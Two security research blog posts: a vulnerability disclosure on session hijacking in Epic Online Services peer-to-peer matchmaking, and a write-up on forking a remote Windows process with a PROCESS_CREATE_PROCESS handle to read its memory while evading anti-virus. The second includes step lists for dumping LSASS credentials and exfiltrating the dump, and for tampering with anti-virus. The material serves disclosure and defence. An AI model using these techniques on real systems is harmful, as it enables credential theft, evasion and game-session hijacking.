For peer-to-peer sessions, attributes are even more important, because they are the only way of carrying information about a session to other players. For a player to join another's peer-to-peer session, they need to retrieve the host's product user ID and an optional socket ID. Most implementations of Epic Online Services store this product user ID in the session's attributes. Of course, only clients with the  GameServer  role are allowed to create sessions and/or modify its attributes.

Exploitation: Session Hijacking

Recalling the first section, the core vulnerability and fundamental design flaw with EOS is that P2P games are required to embed  GameServer  credentials into their application. This means that theoretically speaking, an attacker can create a fake session with any attribute values they'd like. This got me thinking: if attributes are the primary way clients find sessions to join, then with  GameServer  credentials we can effectively "duplicate" existing sessions and potentially hijack the session clients find when searching for the original session.

Sound confusing? It is! Let's talk through a real-world example.

One widely used implementation of Epic Online Services is the "OnlineSubsystemEOS" (EOS-OSS) included with the Unreal Engine. This plugin is a very popular implementation widely used by games such as Satisfactory.

In Satisfactory's use of EOS-OSS, they use an attribute named SES_CSS_SESSIONID to track sessions. For example, if a player wanted their friend to join directly, they could give their friend a session ID from their client which the friend would be able to use to join. When the session ID search is executed, all that's happening is a filter query against all sessions for that session ID attribute value. Once the session has been found, EOS-OSS joins the session by retrieving the required product user ID of the host through another session attribute named OWNINGPRODUCTID.

Since Satisfactory is a peer-to-peer game exclusively using the Epic Online Services API, an attacker can use the credentials embedded in the binary to get access to the  GameServer  role. With a  GameServer  token, an attacker can hijack existing sessions by creating several "duplicate" sessions that have the same session ID attribute, however,  have the OWNINGPRODUCTID attribute set to their own product user ID.

When a victim executes a search for the session with the right session ID, more likely than not, the query will return one of the duplicated sessions that has the attacker's product user ID (ordering of sessions is random). Thus, when the victim attempts to join the game, they will join the attacker's game instead!

This attack is quite more severe than it may seem, because it is trivial to script this attack to hijack all sessions at once and cause all players joining any session to join the attacker's session instead. To summarize, this fundamental design flaw allows attackers to:

  1. Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
  2. Prevent players from joining any "matchmaking session".

Remediation

When it comes to communication, Epic Games was one of the best vendors I have ever worked with. Epic Games consistently responded promptly, showed a high level of respect for my time, and was willing to extensively discuss the vulnerability. I can confidently say that the security team there is very competent and that I have no doubt of their skill. When it comes to actually "getting things done" and fixing these vulnerabilities, the response was questionable.

To my knowledge:

  1. Epic Games has partially* remediated the sensitive information disclosure vulnerability, opting to use a custom addressing format for peer-to-peer hosts instead of exposing their real IP Address in the ADDRESS session attribute.
  2. Epic Games has not remediated the session hijacking issue, however, they have released a new "Client Policy" mechanism, including a Peer2Peer policy intended for "untrusted client applications that want to host multiplayer matches". In practice, the only impact to the vulnerability is that there is an extra layer of authentication to perform it, requiring that the attacker be a user of the game (in contrast to only having client credentials). Epic Games has noted that they plan to "release additional tools to developers in future updates to the SDK, allowing them to further secure their products".

* If a new session does not set its own ADDRESS attribute, the EOS-API will automatically set their public IP Address as the ADDRESS attribute.

Instead of fixing the severe design flaw, Epic Games has opted to update their documentation with several warnings about how to use EOS correctly and add trivial obstacles for an attacker (i.e the user authentication required for session hijacking). Regardless of their warnings, the vulnerability is still in full effect. Here are a list of various notices Epic Games has placed in their documentation:

  1. In the documentation for the Session interface, Epic Games has placed several warnings all stating that attackers can leak the IP Address of a peer-to-peer host or server.
  2. Epic Games has created a brand new Matchmaking Security page which is a sub-page of the Session interface outlining:
  • Attackers may be able to access the IP Address and product user ID of a session host.
  • Attackers may be able to access any custom attributes set by game developers for a session.
  • Some "best practices" such as only expose information you need to expose.
  1. Epic Games has transitioned to a new Client Policy model for authentication, including policies for untrusted clients.

Can this really be fixed?

I'd like to give Epic Games every chance to explain themselves with these questionable remediation choices. Here is the statement they made after reviewing this article.

Regarding P2P matchmaking, the issues you’ve outlined are faced by nearly all service providers in the gaming industry - at its core P2P is inherently insecure. The EOS matchmaking implementation follows industry standard practices. It's ultimately up to developers to implement appropriate checks to best suit their product. As previously mentioned, we are always working to improve the security around our P2P policy and all of our other matchmaking policies.

Unfortunately, I have a lot of problems with this statement:

  1. Epic Games erroneously included the IP Address of peers in the session attributes, even though this information was never required in the first place. Exposing PII unnecessarily is certainly not an industry standard. At the end of the day, an attacker can likely figure out the IP of a client if they have their product user ID and socket ID, but Epic Games made it trivial for an attacker to enumerate and map an entire games' matchmaking system by including that unnecessary info.
  2. "The EOS matchmaking implementation follows industry standard practices": The only access control present is a single layer of authentication...
  3. Epic Games has yet to implement common mitigations such as rate-limiting.
  4. There are an insane number of ways to insecurely implement Epic Online Services and Epic Games has documented none of these cases or how to defend against them. A great example is when games like Satisfactory store sensitive information like a session ID in the session's attributes.
  5. The claim that the Session Hijacking issue cannot be remediated because "P2P is inherently insecure" is simply not true. It's not like you can't trust the central EOS-API server.  Here is what Epic could do to remediate the Session Hijacking vulnerability:
  • A large requirement about the session hijacking attack is that an attacker must create multiple duplicate sessions that match the given attributes. An effective remediation is to limit the number of concurrent sessions a single user can have at once.
  • To prevent attackers from using multiple accounts to hijack a session to a singular session, Epic Games could enforce that the product user ID stored in the session must match the product user ID of the token the client is authenticating with.
  • To be clear, if Epic Games applied my suggested path of remediation, an attacker could still buy 10-20 copies of the game on different accounts to perform the attack on a small-scale. A large-scale attack would require thousands of copies to create enough fake hijacking sessions.
  • The point with this path of remediation is that it would significantly reduce the exploitability of this vulnerability, much more than a single layer of authentication provides.

Epic Games has yet to comment on these suggestions.

But... why?

When I first came across the design flaw that peer-to-peer games are required to embed GameServer credentials, I was curious to how such a fundamental flaw could have gotten past the initial design stage and decided to investigate.

After comparing the EOS landing page from its initial release in 2019 to the current page, it turns out that peer-to-peer functionality was not in the original release of Epic Online Services, but the GameClient and GameServer authentication model was!

It appears as though Epic Games simply didn't consider adding a new role dedicated for peer-to-peer hosts when designing the peer-to-peer functionality of the EOS-API.

Timeline

The timeline for this vulnerability is the following:

07/23/2020 - The vulnerability is reported to Epic Games.
07/28/2020 - The vulnerability is reproduced by HackerOne's triage team.
08/11/2020 - The vulnerability is officially triaged by Epic Games.
08/20/2020 - A disclosure timeline of 135 days is negotiated (for release in December 2020).
11/08/2020 - New impact/attack scenarios that are a result of this vulnerability are shared with Epic Games.
12/02/2020 - The vulnerability severity is escalated to Critical.
12/03/2020 - This publication is shared with Epic Games for review.
12/17/2020 - This publication is released to the public.

Frequently Asked Questions

Am I vulnerable?
If your game uses Epic Online Services, specifically its peer-to-peer or session/matchmaking functionality, you are likely vulnerable to some of the issues discussed in this article.

Epic Games has not remediated several issues discussed; opting to provide warnings in documentation instead of fixing the underlying problems in their platform.

What do I do if I am vulnerable?
If you're a player of the game, reach out to the game developers.

If you're a game or library developer, reach out to Epic Games for assistance. Make sure to review the documentation warnings Epic Games has added due to this vulnerability.

What is the potential impact of these vulnerabilities?
The vulnerabilities discussed in this article could be used to:

  1. Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
  2. Prevent players from joining any "matchmaking session".
  3. Leak the user identifier and IP Address of any player hosting a session.

Abusing Windows’ Implementation of Fork() for Stealthy Memory Operations

26 November 2021 at 04:32
Abusing Windows’ Implementation of Fork() for Stealthy Memory Operations

Note: Another researcher recently tweeted about the technique discussed in this blog post, this is addressed in the last section of the blog (warning, spoilers!).

To access information about a running process, developers generally have to open a handle to the process through the OpenProcess API specifying a combination of 13 different process access rights:

  1. PROCESS_ALL_ACCESS - All possible access rights for a process.
  2. PROCESS_CREATE_PROCESS - Required to create a process.
  3. PROCESS_CREATE_THREAD - Required to create a thread.
  4. PROCESS_DUP_HANDLE - Required to duplicate a handle using DuplicateHandle.
  5. PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
  6. PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
  7. PROCESS_SET_INFORMATION - Required to set certain information about a process such as its priority.
  8. PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
  9. PROCESS_SUSPEND_RESUME - Required to suspend or resume a process.
  10. PROCESS_TERMINATE - Required to terminate a process using TerminateProcess.
  11. PROCESS_VM_OPERATION - Required to perform an operation on the address space of a process (VirtualProtectEx, WriteProcessMemory).
  12. PROCESS_VM_READ - Required to read memory in a process using ReadProcessMemory.
  13. PROCESS_VM_WRITE - Required to write memory in a process using WriteProcessMemory.

The access rights requested will impact whether or not a handle to the process is returned. For example, a normal process running under a standard user can open a SYSTEM process for querying basic information, but it cannot open that process with a privileged access right such as PROCESS_VM_READ.

In the real world, the importance of process access rights can be seen in the restrictions anti-virus and anti-cheat products place on certain processes. An anti-virus might register a process handle create callback to prevent processes from opening the Local Security Authority Subsystem Service (LSASS) which could contain sensitive credentials in its memory. An anti-cheat might prevent processes from opening the game they are protecting, because cheaters can access key regions of the game memory to gain an unfair advantage.

When you look at the thirteen process access rights, do any of them strike out as potentially malicious? I investigated that question by taking a look at the drivers for several anti-virus products. Specifically, what access rights did they filter for in their process handle create callbacks? I came up with this subset of access rights that were often directly associated with potentially malicious operations: PROCESS_ALL_ACCESS, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_SET_INFORMATION, PROCESS_SUSPEND_RESUME, PROCESS_TERMINATE, PROCESS_VM_OPERATION, PROCESS_VM_READ, and PROCESS_VM_WRITE.

This leaves four other access rights that were discovered to be largely ignored:

  1. PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
  2. PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
  3. PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
  4. PROCESS_CREATE_PROCESS - Required to create a process.

These access rights were particularly interesting because if we could find a way to abuse any of them, we could potentially evade the detection of a majority of anti-virus products.

Most of these remaining rights cannot modify important aspects of a process. PROCESS_QUERY_INFORMATION and PROCESS_QUERY_LIMITED_INFORMATION are purely for reading informational details about a process. PROCESS_SET_QUOTA does impact the process, but does not provide much surface to abuse. For example, being able to set a processes' performance limits provides limited usefulness in an attack.

What about PROCESS_CREATE_PROCESS? This access right allows a caller to "create a process" using the process handle, but what does that mean?

In practice, someone with a process handle containing this access right can create processes on behalf of that process. In the following sections, we will explore existing techniques that abuse this access right and its undiscovered potential.

Parent Process Spoofing

An existing evasion technique called "parent process ID spoofing" is used when a malicious application would like to create a child process under a different process. This allows an attacker to create a process while having it appear as if it was launched by another legitimate application.

At a high-level, common implementations of parent process ID spoofing will:

  1. Call InitializeProcThreadAttributeList to initialize an attribute list for the child process.
  2. Use OpenProcess to obtain a PROCESS_CREATE_PROCESS handle to the fake parent process.
  3. Update the previously initialized attribute list with the parent process handle using UpdateProcThreadAttribute.
  4. Create the child process with CreateProcess, passing extended startup information containing the process attributes.

This technique provides more usefulness than just being able to spoof the parent process of a child. It can be used to attack the parent process itself as well.

When creating a process, if the attacker specifies TRUE for the InheritHandles argument, all inheritable handles present in the parent process will be given to the child. For example, if a process has an inheritable thread handle and an attacker would like to obtain this handle indirectly, the attacker can abuse parent process spoofing to create their own malicious child process which inherits these handles.

The malicious child process would then be able to abuse these inherited handles in an attack against the parent process, such as a child using asynchronous procedure calls (APCs) on the parent's thread handle. Although this variation of the technique does require that the parent have critical handles set to be inheritable; several common applications, such as Firefox and Chrome, have inheritable thread handles.

Ways to Create Processes

The previous section explored one existing attack that used the high-level kernel32.dll function CreateProcess, but this is not the only way to create a process. Kernel32 provides abstractions such as CreateProcess which allow developers to avoid having to use ntdll functions directly.

When taking a look under the hood, kernel32 uses ntdll functions and does much of the heavy lifting required to perform NtXx calls. CreateProcess uses NtCreateUserProcess, which has the following function prototype:

NTSTATUS NTAPI
NtCreateUserProcess (
    PHANDLE ProcessHandle,
    PHANDLE ThreadHandle,
    ACCESS_MASK ProcessDesiredAccess,
    ACCESS_MASK ThreadDesiredAccess,
    POBJECT_ATTRIBUTES ProcessObjectAttributes,
    POBJECT_ATTRIBUTES ThreadObjectAttributes,
    ULONG ProcessFlags,
    ULONG ThreadFlags,
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
    PPROCESS_CREATE_INFO CreateInfo,
    PPROCESS_ATTRIBUTE_LIST AttributeList
    );

NtCreateUserProcess is not the only low-level function exposed to create processes. There are two legacy alternatives: NtCreateProcess and NtCreateProcessEx. Their function prototypes are:

NTSTATUS NTAPI
NtCreateProcess (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    BOOLEAN InheritObjectTable,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort
    );

NTSTATUS NTAPI
NtCreateProcessEx (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    ULONG Flags,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort,
    BOOLEAN InJob
    );

NtCreateProcess and NtCreateProcessEx are quite similar but offer a different route of process creation when compared to NtCreateUserProcess.

Forking Your Own Process

A lesser documented limited technique available to developers is the ability to fork processes on Windows. The undocumented function developers can use to fork their own process is RtlCloneUserProcess. This function does not directly call the kernel and instead is a wrapper around NtCreateUserProcess.

A minimal implementation of forking through NtCreateUserProcess can be achieved trivially. By calling NtCreateUserProcess with NULL for both object attribute arguments, NULL for the process parameters, an empty (but not NULL) create info argument, and a NULL attribute list; a fork of the current process will be created.

One question that arose when performing this research was: What is the difference between forking a process and creating a new process with handles inherited? Interestingly, the minimal forking mechanism present in Windows does not only include inheritable handles, but private memory regions too. Any dynamically allocated pages as part of the parent will be accessible at the same location in the child as well.

Both RtlCloneUserProcess and the minimal implementation described are publicly known techniques for simulating fork on Windows, but is there any use forking provides to an attacker?

In 2019, Microsoft Research Labs published a paper named "A fork() in the road", which discussed how what used to be a "clever hack" has "long outlived its usefulness and is now a liability". The paper discusses several areas, such as how fork is a "terrible abstraction" and how it compromises OS implementations. The section titled "FORK IN THE MODERN ERA" is particularly relevant:

Fork is insecure. By default, a forked child inherits everything from its parent, and the programmer is responsible for explicitly removing state that the child does not need by: closing file descriptors (or marking them as close-on-exec), scrubbing secrets from memory, isolating namespaces using unshare() [52], etc. From a security perspective, the inherit by-default behaviour of fork violates the principle of least privilege.

This section covers the security risk that is posed by the ability to fork processes. Microsoft provides the example that a forked process "inherits everything from its parent" and that "the programmer is responsible for explicitly removing state that the child does not need". What happens when the programmer is a malicious attacker?

Forking a Remote Process

I propose a new method of abusing the limited fork functionality present in Windows. Instead of forking your own process, what if you forked a remote process? If an attacker could fork a remote process, they would be able to gain insight into the target process without needing a sensitive process access right such as PROCESS_VM_READ, which could be monitored by anti-virus.

With only a PROCESS_CREATE_PROCESS handle, an attacker can fork or "duplicate" a process and access any secrets that are present in it. When using the legacy NtCreateProcess(Ex) variant, forking a remote process is relatively simple.

By passing NULL for the SectionHandle and a PROCESS_CREATE_PROCESS handle of the target for the ParentProcess arguments, a fork of the remote process will be created and an attacker will receive a handle to the forked process. Additionally, as long as the attacker does not create any threads, no process creation callbacks will fire. This means that an attacker could read the sensitive memory of the target and anti-virus wouldn't even know that the child process had been created.

When using the modern NtCreateUserProcess variant, all an attacker needs to do is use the previous minimal implementation of forking your own process but pass the target process handle as a PsAttributeParentProcess in the attribute list.

With the child handle, an attacker could read sensitive memory from the target application for a variety of purposes. In the following sections, we'll cover approaches to detection and an example of how an attacker could abuse this in a real attack.

Example: Anti-Virus Tampering

Some commercial anti-virus solutions may include self-integrity features designed to combat tampering and information disclosure. If an attacker could access the memory of the anti-virus process, it is possible that sensitive information about the system or the anti-virus itself could be abused.

With Process Forking, an attacker can gain access to both private memory and inheritable handles with only a PROCESS_CREATE_PROCESS handle to the victim process. A few examples of attacks include:

  1. An attacker could read the encryption keys that are used to communicate with a trusted anti-virus server to decrypt or potentially tamper with this line of communication. For example, an attacker could pose as a man-in-the-middle (MiTM) with these encryption keys to prevent the anti-virus client from communicating alerts or spoof server responses to further tamper with the client.
  2. An attacker could gain access to sensitive information about the system that was provided by the kernel. This information could include data from kernel callbacks that an attacker otherwise would not have access to from usermode.
  3. An attacker could gain access to any handle the anti-virus process holds that is marked as inheritable. For example, if the anti-virus protects certain files from being accessed, such as sensitive configuration files, an attacker may be able to inherit a handle opened by the anti-virus process itself to access that protected file.

Example: Credential Dumping

One obvious target for a stealthy memory reading technique such as this is the Local Security Authority Subsystem Service (LSASS). LSASS is often the target of attackers that wish to capture the credentials for the current machine.

In a typical attack, a malicious program such as Mimikatz directly interfaces with LSASS on the victim machine, however, a stealthier alternative has been to dump the memory of LSASS for processing on an attacker machine. This is to avoid putting a well-known malicious program such as Mimikatz on the victim environment which is much more likely to be detected.

With Process Forking, an attacker can evade defensive solutions that monitor or prevent access to the LSASS process by dumping the memory of an LSASS fork instead:

  1. Set debug privileges for your current process if you are not already running as SYSTEM.
  2. Open a file to write the memory dump to.
  3. Create a fork child of LSASS.
  4. Use the common MiniDumpWriteDump API on the forked child.
  5. Exfiltrate the dump file to an attacker machine for further processing.

Proof of Concept

A simple proof-of-concept utility and library have been published on GitHub.

Conclusion

Process Forking still requires that an attacker would have access to the victim process in the default Windows security model. Process Forking does not break integrity boundaries and attackers are restricted to processes running at the same privilege level they are. What Process Forking does offer is a largely ignored alternative to handle rights that are known to be potentially malicious.

Remediation may be difficult depending on the context of the solution relying on handle callbacks. An anti-cheat defending a single process may be able to get away with stripping PROCESS_CREATE_PROCESS handles entirely, but anti-virus solutions protecting multiple processes attempting a similar fix could face compatibility issues. It is recommended that vendors who opt to strip this access right initially audit its usage within customer environments and limit the processes they protect as much as possible.

Didn't I see this on Twitter yesterday?

Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎

— diversenok (@diversenok_zero) November 25, 2021

Yesterday morning, I saw this interesting tweet from @diversenok_zero explaining the same method discussed in this blog post.

One approach I like to take with new research or methods I find that I haven't investigated thoroughly yet is to generate a SHA256 hash of the idea and then post it somewhere publicly where the timestamp is recorded. This way, in cases like this where my research conflicts with what another researcher was working on, I can always prove I discovered the trick on a certain date. In this case, on June 19th 2021, I posted a public GitHub gist of the following SHA256 hash:

D779D38405E8828F5CB27C2C3D75867C6A9AA30E0BD003FECF0401BFA6F9C8C7
You can read the memory of any process that you can open a PROCESS_CREATE_PROCESS handle to by calling NtCreateProcessEx using the process handle as the ParentHandle argument and providing NULL for the section argument.

If you generate a SHA256 hash of the quote above, you'll notice it matches the one I publicly posted back in June.

I have been waiting to publish this research because I am currently in the process of responsibly disclosing the issue to vendors whose products are impacted by this attack. Since the core theory of my research was shared publicly by @diversenok_zero, I decided it would be alright to share what I found around the technique as well.

❌
❌